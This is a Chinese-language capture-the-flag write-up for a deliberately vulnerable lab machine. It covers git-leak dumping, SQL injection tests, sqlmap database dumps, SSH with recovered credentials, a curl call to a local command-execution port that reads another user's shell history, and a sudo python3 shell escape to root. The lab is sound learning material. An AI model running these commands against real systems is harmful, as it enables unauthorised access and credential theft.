难度 高(个人感觉属于中)
目标 root权限+2个flag
基于VMware启动(我这里启动只能选择我wifi的那个网卡才能获取到ip地址,nat的没获取到不知道为什么。)
kali 192.168.1.122 靶机 192.168.1.170
信息收集
端口扫描
只开放了两个端口,不过80端口检测到了git泄露
访问80端口
web测试
右上角有个登录,不过需要邮箱和密码
先使用工具将泄露的信息获取一下
Git泄露
使用git-dumper(虽然我平时也使用的是GitHack但是GItHack不好进行git查看曾经的操作,这个git-dumper方便一点)
项目地址:GitHub - arthaud/git-dumper: A tool to dump a git repository from a website
使用前需要安装一下库的依赖
成功拿到部分源码,首先是查看了一下一些文件发现config文件中有数据库的账户和空密码
然后查看一下git的变更
发现曾经add和change过login.php,login.php中就是登录的功能代码
然后使用git diff看修改了哪里,通过指定上面的文件hash来查看
可以看到在查看到add那个时间之前使用的是账号和密码登录,于是获取到了账号密码
lush@admin.com 321
成功使用账号密码登录后台
SQL注入
看到url有个id=1经典sql注入点可以在源码中看看是不是存在注入,源码中id部分都被写死了并没有看到有可以注入的地方,倒是mobile没有做过滤应该存在过滤
不过问题不大手测一下
id=1'and '1'='1
id=1'and '1'='2
OK存在,其他地方不用测了,用bp抓个包保存为1.txt然后使用sqlmap一把梭
sqlmap -r 1.txt
当前库
sqlmap -r 1.txt --dbs --batch
进darkhole_2 看表
sqlmap -r 1.txt -D darkhole_2 --tables --batch
两个表全部dump看看
sqlmap -r 1.txt -D darkhole_2 --tables --dump --batch
看样子第一个应该是ssh的账密
jehad fool
提权
ssh jehad@192.168.1.170 成功登录
先看一下/etc/passwd发现还存在另一个用户losy
同时查看history发现一些奇怪的命令,可能和下一步有关
netstat -tuln 本机确实开放了9999端口
这个9999端口的服务是losy起的
第一个flag在losy的家目录下
模拟history的命令成功执行
不管怎么样先把提权脚本拿上来进行信息收集一下
没啥有用的信息倒是前面漏了还有一个lama用户同时此用户的家目录下面可以直接sudo到admin
不管怎么样先登上losy看上面有没有什么信息,尝试常见的反弹方式都失败了不知道为什么
那么直接用命令查看一下losy的家目录下的history记录
curl "http://127.0.0.1:9999/?cmd=cat%20/home/losy/.bash_history"
history中有密码泄露gang ,也不知道这是怎么泄露的我记得passwd修改ssh密码也不会显示出来的。
那么直接su losy切换用户
查看losy是不是有SUID提权和sudo提权
发现可以直接以root权限执行pytohn3 再联想之前的history中有个
sudo /usr/bin/python3 -c 'import os; os.system("/bin/sh")'
估计就是用的这个提权。。。怎么都是提示
成功拿到root权限
拿到最后一个flag
后记:
全是提示而且都是比较常见的漏洞类型的利用,属于中等难度吧